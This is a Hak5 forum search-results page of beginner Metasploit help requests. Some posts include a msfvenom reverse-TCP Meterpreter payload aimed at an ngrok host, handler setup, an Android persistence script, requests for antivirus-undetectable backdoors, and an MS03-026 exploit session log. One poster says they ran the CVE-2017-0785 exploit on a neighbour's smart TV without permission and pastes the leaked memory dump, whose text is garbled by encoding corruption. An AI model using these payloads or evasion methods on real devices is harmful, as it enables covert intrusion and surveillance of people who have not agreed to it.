Jump to content

Search the Community

Showing results for tags 'metasploit'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C虏
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

  1. I'm a major newbie so this is probably a stupid question but I've gone to like the third page of Google and can't find anything about why this is happening. I'm basically just testing out the basics of Metasploit on my home router to mess around and I want to delete a host that I added with the "hosts -a" command. I type "hosts -d" and it's still in my hosts list. I'll link a screen shot of whats happening as well. https://imgur.com/a/xpcZHaG
  2. NOTE : THIS IS COMPLETELY FOR EDUCATIONAL PURPOSES AND I AM NOT TRYING TO HACK ANY DEVICE RIGHT NOW TO CREATE PROBLEM FOR SOMEONE .THE PHONE I AM TRYING TO EXPLOIT IS MY OWN SECOND DEVICE. I'm working with metasploit on TERMUX. So, My meterpreter session is open . I am able to access the SDCARD of the phone I am trying to exploit, but everytime I need to exploit the device, one needs to tap the app icon everytime for my meterpreter session to start. I want to create my payload persistent . So that, I don't have to wait for the user of the device to tap the icon again . So , I successfully created a bash file through "nano" which is named "syslogs.sh" and is placed in my sdcard. It works completely fine ; It contacts the device for my meterpreter session to start after a delay of every 20 seconds. So, I want to upload my syslogs.sh file from my SDCARD to sdcard of the device which I'm trying to exploit ; but it's just not happening!. I am getting an error like this >>>>> [-] 4 : Operation failed: 1 You can refer this image here . you can see here that I've also tried adding backslashes but it didn't seem to work. The location of my file is absolutely fine . If someone wants to exactly know what I'm trying to implement they can check this . I've honestly tried searching for solutions , I've seen previous solutions and posted my question on subreddits, stackoverflow, github but I'm not getting anything . I am really positive that you can guys can help me. I would highly appreciate ANY KIND OF SUGGESTION . I am absolutely new to this forum so if I've posted something wrong or I'm at a wrong place you can always let me know and I'll delete this post. Hoping for your replies.
  3. I'm pretty new to Metasploit but I have what appears to be a successful shell/session created however there is no prompt (normal commands return nothing) and I see that it shows only the default route ( between my computer and the target. I did input my LHOST though it is a staged bind shell payload (inline payload shells produce the same result and meterpreter payloads don't work). Is it possible to obtain a full interactive shell? ======================================================================================================================================= msf5 exploit(windows/dcerpc/ms03_026_dcom) > run [*] 10.XX.XX.XX:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal... [*] 10.XX.XX.XX:135 - Binding to ZZ@ff_ip_tcp:10.XX.XX.XX[135] ... [*] 10.XX.XX.XX:135 - Bound to ZZ@ff_ip_tcp:10.XX.XX.XX[135] ... [*] 10.XX.XX.XX:135 - Sending exploit ... [*] Started bind TCP handler against 10.XX.XX.XX:135 [*] Encoded stage with x86/shikata_ga_nai [*] Sending encoded stage (267 bytes) to 10.XX.XX.XX [*] Command shell session 1 opened ( -> 10.XX.XX.XX:135) at 2020-07-21 14:50:17 -0600 background Background session 1? [y/N] y msf5 exploit(windows/dcerpc/ms03_026_dcom) > sessions -i Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 shell x86/windows -> 10.XX.XX.XX:135 (10.XX.XX.XX) msf5 exploit(windows/dcerpc/ms03_026_dcom) >
  4. Host OS: Windows 10 Pineapple Nano v. 2.7.0 VirtualBox v. 6.1.6 Kali Linux v. 2020.2 **Forward: I've been doing all this on my own private router, WiFi signal, computer, etc. Nothing illegal. Just trying to learn a new skill.** So I've been able to successfully capture a 4-way handshake (Both .CAP and.PCAP) using either the Pineapple Nano or Kali Linux> Successfully cracked the password of the WiFi AP using www.GPUHASH.me> And I can log into the "client" AP. I just don't know where to go from here and feel pretty dumb. How do I actually exploit the target from here? Over the last week I've been trying to learn Metasploit in Kali, thinking that this was the next logical step in the attack process. (I've also tried Armitage, but it seems like it's outdated and doesn't support Windows 10?) I understand the workflow of Metasploit: 1. Recon the target with various nmap scans: nmap -v -T4 -PA -sV --version-all --osscan-guess -A -sS -Pn 1-65535 <Target IP address> 2. Note the open port numbers/software & version numbers, etc. 3. (THIS IS WHERE I GET LOST) Search Exploit-Database.com for vulnerabilities on the open ports or services being run (See attached picture) 4. Load the Exploit> Set options> Run. I keep getting confused as to how to actually find known vulnerabilities given the data from the nmap scans. Has anyone else been in my position or am I just failing to understand something simple here? Thank you very much for any feedback guys!
  5. Hello guys, Before I start, I want to say that I looked on all the forums for a solution and tried multiple options until I started writing this. I have tried to make an exploit for Android. Everything works fine until I open the apk on my test phone where after I installed it by bypassing the security restrictions, it doesn't do anything. On msf it doesn't show that it's connected to a device. As well, regardless if I stop the exploit, kill it and remove it, the server is still up and contains the file. I need a solution since I believe that this is caused by the recent changes in metasploit and android 9.
  6. Hi Guys need help with this problem im having so im trying to hack my samsung s7 edge with a meterpreter apk and when i install and open it on my phone nothing happens it still says started reverse_TCP handler on my ip address :4444 any fixes? sincerely, Kyran
  7. How do I actually increase the dimensions of the pictures while doing webcam stream and snap? I'm currently using on my android, and while I can increase the quality to 100, my pictures come very small. It's possible to take as the size of the camera of the cellphone, or at least increase it a little bit?
  8. Im working with Kali Linux. I started getting into working with Metasploit, Payloads ... But heres the problem: I am not finding a way to create a Payload, that does not get detected by a Antivirus. Please Help 馃槃
  9. Hello people....... tried to get a connection vie Meterpreter to mi Pineapple nano, but all the fuck i h get is this msf5 exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address (an interface may be specified) LPORT 4747 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on [*] Sending stage (179779 bytes) to Who knows more?
  10. I am trying to get more proficient with Metasploit. I have encountered an issue that has made me crazy the last few days. Using ms08_067_netapi in any manner I am getting: Handler failed to bind to xx.xxx.xx.x:4444:- - [*] Started reverse TCP handler on [-] xx.xxx.xx.x:445 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (xx.xxx.xx.x:445). [*] Exploit completed, but no session was created. I have found so much about this error but not the first full clear resolution. I have done so many things but so far I have been nulled. Any ideas or suggestions? Intel Xeon 8180 Octacosa-core Intel LGA 3647 Board Running 8 15TB Utrastar Drives Windows 10 Host/w Kali
  11. There are soo less commands for android in metasploit. It would be okay But i didnt find the command i needed the most. It was something like vnc_start . I dont remember but i used it in windows a long time ago and i got to see what the victim is doing etc. So how will i do it for android too.? Please help me out in this
  12. Hi, I wanted to learn how to perform ATP attacks. I have a problem with creating a backdoor / payload that will not be detected by antivirus systems and which will give me access to the attacked computer via a reverse connection. I'm not a good programmer, but I thought I would create my own code that would give me a system shell using the SSH reverse tunnel. I find that if it will be my code it will not be detectable for AV. Unfortunately, the more I think about it, I come to the conclusion that once I have such a system shell, I still have to provide a meterpreter payload, which will allow for more advanced work, and it will definitely detect the anti-virus. I want to learn but I do not know what to do in such a situation. How to create a meterpreter payload that will not be detected by AV? I see that msvenom generates already encoded payload. Is it possible to get such a payload not encrypted? Maybe if I changed his sources in pure C, it would be less detectable? I've tried veil, shellter, thefatrat, etc. But it does not help. Most AV immediately detect payload. I am mainly interested in payloads on MS Windows. Later I want to try Android.
  13. First thing first (1) Opening Terminal and typing following command:- "msfconsole" and getting this output:- so i ran that command in terminal did't worked out now after googling for 3 hrs i found many things which are here 1). i should run "bundle install" in this directory /usr/share/metasploit-framework after that i'm getting this error Now again after doing research i found that i've to update jason so ran following command "gem install json -v1.8.3" which gave me output as:- Please guys help me out here i can't open msfconsole.!馃槬
  14. Hi There, I am new to the Metasploit or something related to security likes hacks. I have some question. 1) First question, how to offline update Metasploit, can i just update for the latest update (Nov 2018) or must be one by one ? Example: Must be updated from Jan'18 - Feb'18 - Mar'18 .. until Nov'18 2) OS Usage, mostly Metasploit use or launched from Kali Linux. How if i run from Windows 7, is there any mallfunction or can be caused the other target PC error ? 3) While i try to exploiting, there are many lines likes: - No Payloads were compatible with exploit bla bla bla - Exploit failed: A payload has not been selected. Am i need to make the payloads first ? (how ?) For the last, if someone have simple tutorial how to use Metasploit, very glad if you can share with me. Waiting for some responses from the forums. Thank you in advance. Best Regards, Ruben.
  15. Hi Everyone. I am running a number of Metasploit modules for exploiting Siemens S7-300/400 and S7-1200 PLCs that were created from a Blackhat talk by Dillion Beresford in 2011. The modules are not supplied with Metasploit but have been added to the auxiliary/admin/scada/ directory. This is a link to the Modules https://github.com/moki-ics/s7-metasploit-modules The modules are showing up in Metasploit correctly and can be configured but when they are run there are a number of errors. Here is a link to a screen shot showing the errors: The module shown in the screen shot is simatic_s7_1200_command.rb I suspect the issue I am having is due to the version of Ruby being used with Metasploit is not compatible with the modules. I have run the modules in Metasploit running on Mac OSx, Metasploit on Kali running on a VM and Metasploit running on Kali on Raspberry Pi, all with same results. Greatly appreciate any help any1 can give me on this 1!
  16. Can i run a payload(meterpreter)(metasploit) on android with rubber ducky or bash bunny over (wan)
  17. So heres whats going on i made a shell, using reverse_tcp. And i put it on victims computer and opened it everything went smoothly in the process of opening the exe, anyways after i opened it, the shell didnt send a tcp connection back to me. Im doing this on a LAN network, both computers are right beside each other connected to ethernet. I made the exploit in a vm then uploaded it to mediafire and downloaded on other pc. But when i ran it, i didnt get a connection back it was like it was never ran. Heres all my console output currently even after opening i didnt take a screenshot but i did copy and paste. And put it on pastebin, so heres the link hopefully one of you can help me i would also like to say the the target pc had antivirus disabled. LINK: https://pastebin.com/R9G5nQGB I used port 4444 and my local ip. That link shows the whole process of setting up the payload and handler thats what all i did. Thanks to everyone who takes the time to read this i really need help.
  18. Hey guys, my problem is that I have just installed the Kali Linux VMware Image. I changed my pass and then I did an update (apt-get update && apt-get dist-upgrade). Now I get an error when I try to initialize the Metasploit databse with 鈥瀖sfdb init" : root@kali:~# msfdb reinit Database already started [+] Dropping databases 'msf' [+] Dropping databases 'msf_test' [+] Dropping database user 'msf' [+] Deleting configuration file /usr/share/metasploit-framework/config/database.yml [+] Stopping database [+] Starting database [+] Creating database user 'msf' Geben Sie das Passwort der neuen Rolle ein: Geben Sie es noch einmal ein: [+] Creating databases 'msf' [+] Creating databases 'msf_test' [+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml' [+] Creating initial database schema rake aborted! NoMethodError: undefined method `without' for #<Bundler::Settings:0x0000564cdb9a7b70> Did you mean? with_options /usr/share/metasploit-framework/Rakefile:18:in `rescue in <top (required)>' /usr/share/metasploit-framework/Rakefile:12:in `<top (required)>' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rake-12.3.0/exe/rake:27:in `<top (required)>' Caused by: LoadError: cannot load such file -- rspec/core /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/backports-3.11.1/lib/backports/std_lib.rb:9:in `require' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/backports-3.11.1/lib/backports/std_lib.rb:9:in `require_with_backports' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activesupport-4.2.10/lib/active_support/dependencies.rb:274:in `block in require' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activesupport-4.2.10/lib/active_support/dependencies.rb:240:in `load_dependency' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activesupport-4.2.10/lib/active_support/dependencies.rb:274:in `require' /usr/share/metasploit-framework/Rakefile:13:in `<top (required)>' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rake-12.3.0/exe/rake:27:in `<top (required)>' (See full trace by running task with --trace) Also when I start msfconsole there appears an error : root@kali:~# msfconsole /usr/share/metasploit-framework/lib/msf/core/opt.rb:55: warning: constant OpenSSL::SSL::SSLContext::METHODS is deprecated When I type db_status in msfconsole it says it is connected, but when i search for something it says that the cache is not build yet. Anyone got a solution for this ? :/ Thanks in advance
  19. v0dka

    Payload timeout

    Hi. I met a problem recently : I have installed metasploit and it runs well in SSH. But when I tried to run it in in a payload, just like: /root/metasploit-framework/msfconsole & It will run for a while, I can find it with cmd "ps -aux | grep 'msfconsole' ". But it then disappeared! As it takes a long time for msf to startup. so I think maybe the payload has a timeout. I'm not sure what's wrong with it. Thanks in advance
  20. Hey there! I am Luuk a 14 year old boy who's very intrested in cyber security. When I was little [smaller] ;] I always dream about being a cool hacker. Like 1 year ago I decided to start so i made a usb with kali linux on it and i learned the basics from metasploit [meterpreter payloads] I also discovered how to hide virus for a lot of av like windows defender. I also learned the basic commands of the terminal and working with armitage. But I have 1 problem ;[ Every time when i want to start a listener i make the payload like this msfvenom -p windows/meterpreter/reverse_tcp LHOST=tcp.ngrok.io LPORT=the port of ngrok -f exe > payload.exe So thats done and i wanted to start a listener. I open metasploit and type: use multi/handler set payload windows/meterpreter/reverse_tcp set lhost set lport 80 exploit Ok so a few month's ago it would say started reverse handler ........ And it started to listen Now it says started reverse handler and a new line is opened. What!!! What's going on When i search the job with services its listening but when i type run {job nummer} it says did you wanted a reversebindlistenadress Failed to bind failed to bind So thats my problem oh. Extra note: I use ngrok for meterpreter over wan {i can't port forward for some reason} It would be great if i can get a answer thanks and happy hacking!
  21. Hello! I would like to ask if there is any way to use meterpreter directly from the bash bunny metasploit over wan after i infected a machine. And also if S. E. T is working :) Thanks in advance :)
  22. Digging my way through metasploit using armitage on my pentest lab. I have three VMs (of 15 installed) running 1.metasploitable 2.Windows XP32 SP2 3.CentOS Nmap scan via Armitage is finding metasploitable and CentoS but not the Windows XP machine (which is kinda funny actually). However when I run Zenmap separately, it finds that machine. All VMs are in the same network. Am I missing something for metasploit to see a Windows machine? Interestingly when I review the output from the scan, there is a line that says "All 65535 scanned ports on {IP ADDRESS} are filtered...maybe I should go back to using Windows XP...
  23. blackcoat


    Fud backdoor with Pwnwinds with bat. format + Powershell is not connecting with metasploit listener.The backdoor was made by TheFatRat connection type :reverse https Attacked virtual box os type:windows 10
  24. Hello everyone, I am new here - this is very first post. I hope it's in the correct section! Anyway, the past week I have been wanting to port forward in order to be able to start an external session (get into meterpreter when the victim is not using my IP) However, it turns out that port forwarding isn't possible on IPV6 - in fact, it WOULD work if the victim uses IPV6 as well. I haven't confirmed that, anyway. ( please correct me if I am wrong here) My question is, is there any way to start a session as an IPV6 user, as in maybe an exploit that can do it? I usually use the multi/handler exploit, with the windows/meterpreter/reverse_tcp payload. (also tried reverse_ipv6_tcp) If someone can help me or respond to this thread I will highly appreciate it! Thank you!
  25. Hope someone can help me....... I used CVE-2017-0785 to exploit my neighbours SmartTV...... It gave me this out ---> sudo python CVE-2017-0785.py TARGET=CC:B1:1A:F6:D7:76 [!] Pwntools does not support 32-bit Python. Use a 64-bit release. [+] Exploit: Done 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 鈹偮仿仿仿封攤路路路路鈹偮仿仿仿封攤路路路路鈹 * 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 01 鈹偮仿仿仿封攤路路路路鈹偮仿仿仿封攤路路路路鈹 00000030 b5 69 01 00 b4 8f e9 c0 00 00 00 00 b5 54 fe a3 鈹偮穒路路鈹偮仿仿仿封攤路路路路鈹偮稵路路鈹 00000040 00 00 00 06 b5 69 39 70 b4 8f e9 e0 b5 60 61 38 鈹偮仿仿仿封攤路i9p鈹偮仿仿仿封攤路`a8鈹 00000050 b5 60 61 38 b5 69 39 70 b5 69 39 64 b5 69 5a a4 鈹偮穈a8鈹偮穒9p鈹偮穒9d鈹偮穒Z路鈹 00000060 b4 8f e9 f8 00 00 00 00 b5 69 5a a4 00 00 00 41 鈹偮仿仿仿封攤路路路路鈹偮穒Z路鈹偮仿仿稟鈹 00000070 b4 8f eb 84 b5 54 e6 f9 b5 60 61 38 b5 69 41 78 鈹偮仿仿仿封攤路T路路鈹偮穈a8鈹偮穒Ax鈹 00000080 b4 8f ea 08 b5 56 e0 4f b4 8f ea 10 b5 54 57 fd 鈹偮仿仿仿封攤路V路O鈹偮仿仿仿封攤路TW路鈹 00000090 00 00 00 00 b5 69 41 60 b5 56 79 59 b5 69 39 64 鈹偮仿仿仿封攤路iA`鈹偮稸yY鈹偮穒9d鈹 000000a0 b4 8f ea 30 00 00 00 18 b4 8f ea d0 b5 54 ca c3 鈹偮仿仿0鈹偮仿仿仿封攤路路路路鈹偮稵路路鈹 000000b0 b5 69 41 60 00 00 00 05 b5 60 61 38 b4 8f ea 58 鈹偮穒A`鈹偮仿仿仿封攤路`a8鈹偮仿仿稾鈹 000000c0 00 00 00 18 b4 8f ea d0 b5 69 39 64 b5 54 d2 bf 鈹偮仿仿仿封攤路路路路鈹偮穒9d鈹偮稵路路鈹 000000d0 00 00 00 00 b4 30 04 90 00 00 00 00 42 27 e0 00 鈹偮仿仿仿封攤路0路路鈹偮仿仿仿封攤B'路路鈹 000000e0 00 00 00 00 b5 69 39 64 00 00 00 08 00 00 00 01 鈹偮仿仿仿封攤路i9d鈹偮仿仿仿封攤路路路路鈹 000000f0 b4 30 04 90 b4 8f ea d0 00 00 00 41 b5 69 39 64 鈹偮0路路鈹偮仿仿仿封攤路路路A鈹偮穒9d鈹 00000100 b4 8f ea a8 b5 69 41 60 00 00 00 03 b5 69 39 64 鈹偮仿仿仿封攤路iA`鈹偮仿仿仿封攤路i9d鈹 00000110 b5 60 61 38 b4 30 c8 d8 b4 8f ea a0 b5 56 e0 4f 鈹偮穈a8鈹偮0路路鈹偮仿仿仿封攤路V路O鈹 00000120 b4 8f ea a8 b5 56 f6 21 b4 30 c8 d8 41 02 6f 10 鈹偮仿仿仿封攤路V路!鈹偮0路路鈹侫路o路鈹 00000130 b4 8f ea b8 b5 50 a1 b7 21 00 00 14 0e 0a 24 00 鈹偮仿仿仿封攤路P路路鈹!路路路鈹偮仿$路鈹 00000140 b5 60 61 38 b5 69 ab 60 b4 8f ea d0 b5 56 e0 4f 鈹偮穈a8鈹偮穒路`鈹偮仿仿仿封攤路V路O鈹 00000150 b4 8f ea d8 b5 69 ab 58 b3 6d d4 87 00 00 00 00 鈹偮仿仿仿封攤路i路X鈹偮穖路路鈹偮仿仿仿封攤 00000160 b4 8f ea f8 00 00 00 02 00 00 00 10 b3 6d f4 b0 鈹偮仿仿仿封攤路路路路鈹偮仿仿仿封攤路m路路鈹 00000170 b5 60 61 38 b5 56 d2 45 b4 8f eb 10 00 00 00 00 鈹偮穈a8鈹偮稸路E鈹偮仿仿仿封攤路路路路鈹 00000180 b5 69 5a a4 00 00 00 41 00 00 00 13 b5 54 e6 f9 鈹偮穒Z路鈹偮仿仿稟鈹偮仿仿仿封攤路T路路鈹 00000190 b4 8f ed 24 b5 69 41 60 b5 60 61 38 b4 8f eb 30 鈹偮仿仿$鈹偮穒A`鈹偮穈a8鈹偮仿仿0鈹 000001a0 00 00 00 19 b4 8f ed 24 00 00 00 41 b5 54 9f 4b 鈹偮仿仿仿封攤路路路$鈹偮仿仿稟鈹偮稵路K鈹 000001b0 00 00 00 00 b5 69 41 60 b5 60 61 38 00 00 00 64 鈹偮仿仿仿封攤路iA`鈹偮穈a8鈹偮仿仿穌鈹 000001c0 b4 8f eb 48 b5 56 e0 4f b4 8f eb 50 b5 56 ef 31 鈹偮仿仿稨鈹偮稸路O鈹偮仿仿稰鈹偮稸路1鈹 000001d0 b5 60 61 38 b5 69 ab 60 b5 60 61 38 b5 69 ab 60 鈹偮穈a8鈹偮穒路`鈹偮穈a8鈹偮穒路`鈹 000001e0 b4 8f eb 68 b5 56 e0 4f b4 8f eb 70 b5 54 57 fd 鈹偮仿仿穐鈹偮稸路O鈹偮仿仿穚鈹偮稵W路鈹 000001f0 b5 69 ab 58 b4 8f ed 24 00 00 00 41 b5 69 ab 10 鈹偮穒路X鈹偮仿仿$鈹偮仿仿稟鈹偮穒路路鈹 00000200 b4 8f eb 90 00 00 00 0f b4 8f ed 24 b5 56 82 8b 鈹偮仿仿仿封攤路路路路鈹偮仿仿$鈹偮稸路路鈹 00000210 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 鈹偮仿仿仿封攤路路路路鈹偮仿仿仿封攤路路路路鈹 00000220 b5 60 61 38 b5 60 61 38 b3 6e 95 b8 00 00 00 41 鈹偮穈a8鈹偮穈a8鈹偮穘路路鈹偮仿仿稟鈹 00000230 b4 8f eb c8 00 00 00 41 b3 6e 95 b8 b5 60 61 38 鈹偮仿仿仿封攤路路路A鈹偮穘路路鈹偮穈a8鈹 00000240 b3 6e b5 f0 b5 56 79 25 b5 56 78 bd b5 69 41 60 鈹偮穘路路鈹偮稸y%鈹偮稸x路鈹偮穒A`鈹 00000250 b5 69 39 64 00 00 00 14 b4 8f eb e0 b5 54 cd db 鈹偮穒9d鈹偮仿仿仿封攤路路路路鈹偮稵路路鈹 00000260 b5 56 79 59 b5 69 39 64 b4 8f eb f0 b5 54 c9 f5 鈹偮稸yY鈹偮穒9d鈹偮仿仿仿封攤路T路路鈹 00000270 b5 69 41 60 b5 69 41 60 00 00 00 06 b5 60 61 38 鈹偮穒A`鈹偮穒A`鈹偮仿仿仿封攤路`a8鈹 00000280 b4 8f ec 18 00 00 00 14 b3 6e f6 60 b5 54 d2 13 鈹偮仿仿仿封攤路路路路鈹偮穘路`鈹偮稵路路鈹 00000290 b5 54 da cd b5 69 41 60 00 00 00 00 b5 69 39 64 鈹偮稵路路鈹偮穒A`鈹偮仿仿仿封攤路i9d鈹 000002a0 b4 8f ec 38 00 00 00 00 00 00 00 00 b5 60 00 00 鈹偮仿仿8鈹偮仿仿仿封攤路路路路鈹偮穈路路鈹 000002b0 b5 60 61 38 b3 6f 16 a0 00 00 00 41 00 00 00 0f 鈹偮穈a8鈹偮穙路路鈹偮仿仿稟鈹偮仿仿仿封攤 000002c0 b4 8f ec 68 00 00 00 0f b3 6f 16 a8 b5 60 61 38 鈹偮仿仿穐鈹偮仿仿仿封攤路o路路鈹偮穈a8鈹 000002d0 b3 6f 36 d0 b5 54 6e 5d 00 00 00 00 ff ff ff ff 鈹偮穙6路鈹偮稵n]鈹偮仿仿仿封攤路路路路鈹 000002e0 00 00 00 00 b5 68 13 71 00 00 00 0c b5 69 39 70 鈹偮仿仿仿封攤路h路q鈹偮仿仿仿封攤路i9p鈹 000002f0 00 00 00 0e b5 5d 62 84 b5 5d 62 c0 b5 5d 62 e0 鈹偮仿仿仿封攤路]b路鈹偮穄b路鈹偮穄b路鈹 00000300 b5 5d 63 10 b5 5d 63 3c b5 5d 63 68 00 00 00 41 鈹偮穄c路鈹偮穄c<鈹偮穄ch鈹偮仿仿稟鈹 00000310 b3 6c 82 1c 00 00 00 01 00 00 00 00 b3 6c 82 36 鈹偮穕路路鈹偮仿仿仿封攤路路路路鈹偮穕路6鈹 00000320 b4 8f ed 24 00 00 00 41 b3 6c 82 36 00 00 00 00 鈹偮仿仿$鈹偮仿仿稟鈹偮穕路6鈹偮仿仿仿封攤 00000330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 鈹偮仿仿仿封攤路路路路鈹偮仿仿仿封攤路路路路鈹 00000340 00 00 00 00 b5 60 61 38 b5 60 61 38 b5 69 39 70 鈹偮仿仿仿封攤路`a8鈹偮穈a8鈹偮穒9p鈹 00000350 b5 69 39 64 b5 69 5a a4 b4 8f ec f0 00 00 00 00 鈹偮穒9d鈹偮穒Z路鈹偮仿仿仿封攤路路路路鈹 00000360 b5 69 5a a4 b4 31 15 07 b5 69 39 70 b5 54 e6 f9 鈹偮穒Z路鈹偮1路路鈹偮穒9p鈹偮稵路路鈹 00000370 b5 69 39 64 00 00 00 02 b5 69 5a a4 b4 8f ed 20 鈹偮穒9d鈹偮仿仿仿封攤路iZ路鈹偮仿仿 鈹 00000380 b4 31 15 07 00 00 00 0c b4 31 15 07 b5 54 ea 59 鈹偮1路路鈹偮仿仿仿封攤路1路路鈹偮稵路Y鈹 00000390 00 00 00 00 00 00 00 00 00 00 00 00 41 02 6f 10 鈹偮仿仿仿封攤路路路路鈹偮仿仿仿封攤A路o路鈹 000003a0 b5 5d 88 94 b5 5d 88 5c b4 8f f8 f0 b5 69 f7 20 鈹偮穄路路鈹偮穄路\鈹偮仿仿仿封攤路i路 鈹 000003b0 00 00 02 e9 42 2b d0 10 00 00 01 74 00 00 00 00 鈹偮仿仿仿封攤B+路路鈹偮仿仿穞鈹偮仿仿仿封攤 000003c0 b4 8f ed 58 00 00 00 00 b4 8f ed 50 00 00 00 81 鈹偮仿仿稾鈹偮仿仿仿封攤路路路P鈹偮仿仿仿封攤 000003d0 42 2b cc 60 b4 8f ed 60 00 00 00 00 00 00 00 00 鈹侭+路`鈹偮仿仿穈鈹偮仿仿仿封攤路路路路鈹 000003e0 00 00 00 00 b5 69 f7 20 b5 69 f6 d4 00 00 00 00 鈹偮仿仿仿封攤路i路 鈹偮穒路路鈹偮仿仿仿封攤 000003f0 b4 8f ed 78 b5 69 f6 b0 00 00 00 00 00 00 ff ff 鈹偮仿仿穢鈹偮穒路路鈹偮仿仿仿封攤路路路路鈹 00000400 b4 8f ed 98 b4 8f ed 90 b4 8f f8 f0 0e 0a 24 00 鈹偮仿仿仿封攤路路路路鈹偮仿仿仿封攤路路$路鈹 00000410 b4 8f ed 98 鈹偮仿仿仿封攤鈹 00000414 Who knows what to do now with this Code?
  • Create New...